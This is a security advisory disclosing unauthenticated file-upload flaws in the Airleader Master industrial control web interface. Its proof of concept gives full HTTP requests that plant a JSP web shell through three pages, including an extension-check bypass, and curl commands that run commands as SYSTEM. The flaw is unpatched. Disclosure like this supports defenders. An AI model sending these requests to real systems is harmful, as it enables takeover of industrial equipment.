-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2025-044
Product:                   Airleader Master
Manufacturer:              Airleader WF Steuerungstechnik GmbH
Affected Version(s):       <= 6.381
Tested Version(s):         6.381
Vulnerability Type:        Unrestricted Upload of File with Dangerous Type (CWE-434)
Risk Level:                Critical
Solution Status:           Unresolved
Manufacturer Notification: 2025-07-08
Solution Date:             -
Public Disclosure:         2026-03-03
CVE Reference:             CVE-2026-1358
Author of Advisory:        Angel Lomeli, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Airleader Master (see [1]) is a management software for large hardware modules
used to control compressed air stations, mainly used in the manufacturing
industry. The units are focused on efficiency and economization of resources,
allowing for the measuring and control of compressed air quality. They include
embedded web interfaces for data visualization and management.

The application includes multiple pages which permit unrestricted file upload.
This can be abused to upload malicious files to the web server and achieve
remote command execution (RCE) in the underlying OS.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The application allows for file uploads without any authentication in multiple
pages. There are generally no restrictions on the files that can be uploaded,
with the exception of a simple extension check for one of these pages. However,
this check can be easily bypassed.

This permits unauthenticated users to upload, for example, a web shell into
the system, leading to full control of the server. It was also found that the
web server runs with the highest privileges.

The following pages are affected:
#1 - /<station-name>/wizard/doit.jsp
#2 - /<station-name>/wizard/uploader/doit.jsp
#3 - /administrator/update.jsp

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

To reproduce this, follow the steps described below.

For any of the following scenarios, <station-name> is the name of the pre-
configured station. If no station exists, a new station can be configured
by logging in to the administrative interface as Admin with the default
credentials reported in a previous advisory (SYSS-2020-033, see [2]).

#1 - Unauthenticated insecure upload: /<station-name>/wizard/doit.jsp

1. Send a JSP shell in the "qqfile" parameter of a multipart request. The
page has a simple check that verifies if the file has an image extension
in its name. This can be easily bypassed by including an image extension
anywhere in the filename. No authentication is required.

Request:
POST /<station-name>/wizard/doit.jsp HTTP/1.1
Host: <host>
Content-Type: multipart/form-data; boundary=---------------------------6139936709994052754037219976
Content-Length: 869

- -----------------------------6139936709994052754037219976
Content-Disposition: form-data; name="qqfile"; filename="cmdjsp.jpg.jsp"
Content-Type: image/png

<FORM METHOD=GET ACTION='cmdjsp.jpg.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
...

[JSP web shell content]
- -----------------------------6139936709994052754037219976--


2. The web shell can then be reached at the following path:
/<station-name>/wizard/images/panel/<filename>

$ curl http://<host>/<station-name>/wizard/images/panel/cmdjsp.jpg.jsp?cmd=whoami
...
<pre>
nt-authority\system
</pre>


#2. Unauthenticated insecure upload: /<station-name>/wizard/uploader/doit.jsp

1. Send a JSP shell as stated above. This page does not have any extension
checks. No authentication is required.

Request:
POST /<station-name>/wizard/uploader/doit.jsp HTTP/1.1
<HTTP-Headers-as-above>

- -----------------------------6139936709994052754037219976
Content-Disposition: form-data; name="qqfile"; filename="cmdjsp.jsp"
Content-Type: image/png

[JSP web shell content]


2. Just like before, the web shell can then be reached at the path below:
/<station-name>/wizard/images/panel/<filename>

$ curl http://<host>/<station-name>/wizard/images/panel/cmdjsp.jsp?cmd=whoami
...
<pre>
nt-authority\system
</pre>


#3. Unauthenticated insecure upload: /administrator/update.jsp

1. Send a JSP just like before, but use the parameter "datei".

Request:
POST /administrator/update.jsp HTTP/1.1
<HTTP-Headers-as-above>

- -----------------------------6139936709994052754037219976
Content-Disposition: form-data; name="datei"; filename="cmdjsp.jsp"
Content-Type: image/png

[JSP web shell content]


2. The web shell can then be reached at the following path:
/administrator/wars/<filename>

$ curl http://<host>/administrator/wars/cmdjsp.jsp?cmd=whoami
...
<pre>
nt-authority\system
</pre>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The vendor has not yet released a security update. The web application should
limit the type of files that can be uploaded to the server. Only files
specified in an allowlist should be permitted, while anything that differs
should be blocked. The server should also have protective measures in place
to avoid executing files uploaded by users as part of the application's source
code. Ideally, the web server should not run with the highest privileges for
the underlying operating system.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-06-18: Vulnerability discovered
2025-07-08: Vulnerability reported to manufacturer
2025-07-15: Contact retry
2026-03-03: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Airleader modules
    https://www.airleader.de/produkte
[2] SySS Security Advisory SYSS-2020-033
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-033.txt
[3] SySS Security Advisory SYSS-2025-044
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-044.txt
[4] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[5] CISA Security Advisory ICSA-26-043-10
    https://www.cisa.gov/news-events/ics-advisories/icsa-26-043-10

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by:

E-Mail: angel.lomeli@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Angel_Lomeli.asc
Key ID: 0x3511BA21C68F0D7A
Key Fingerprint: A081 85AB C051 78ED CE8A F8E2 3511 BA21 C68F 0D7A

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en

-----BEGIN PGP SIGNATURE-----

iHUEARYKAB0WIQSggYWrwFF47c6K+OI1Ebohxo8NegUCaaBSQgAKCRA1Ebohxo8N
esQhAP46ERvt+3FkCd3wdW5lhKkn7jCiELyMlja5eFhavAo0vAD/UDhlWW3YWWvF
fRb4+ztieP0B/ApGkL7YSFx2itGoAAA=
=4htf
-----END PGP SIGNATURE-----